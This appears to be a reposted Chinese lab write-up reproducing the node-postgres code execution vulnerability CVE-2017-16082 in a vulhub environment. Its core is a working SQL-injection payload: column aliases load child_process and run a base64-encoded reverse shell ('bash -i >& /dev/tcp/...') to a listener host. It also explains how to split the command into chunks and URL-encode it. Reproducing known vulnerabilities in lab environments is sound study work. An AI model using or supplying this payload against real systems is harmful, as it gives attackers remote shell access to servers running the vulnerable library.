概述
漏洞原理
请参考这篇文章:https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html
漏洞复现
我这里用的是vulhub的环境,启动环境后,访问http://your-ip:3000/?id=1
即可查看到id为1的用户信息,当然id
这里存在注入点,我们利用poc来RCE。比如我想执行命令echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyOC85OSAwPiYx|base64 -d|bash
,则需要适当分割该字符串,每段不超过64字符,然后替换一下POC:
SELECT 1 AS "']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIu`+/*", 4 AS "*/`MTY4LjMwLjEyOC85OSAwPiYx|base64 -d|bash`)//"
然后将其url编码并发送即可执行命令。
最后
以上就是俏皮小刺猬为你收集整理的node-postgres 代码执行漏洞(CVE-2017-16082)的全部内容,希望文章能够帮你解决node-postgres 代码执行漏洞(CVE-2017-16082)所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复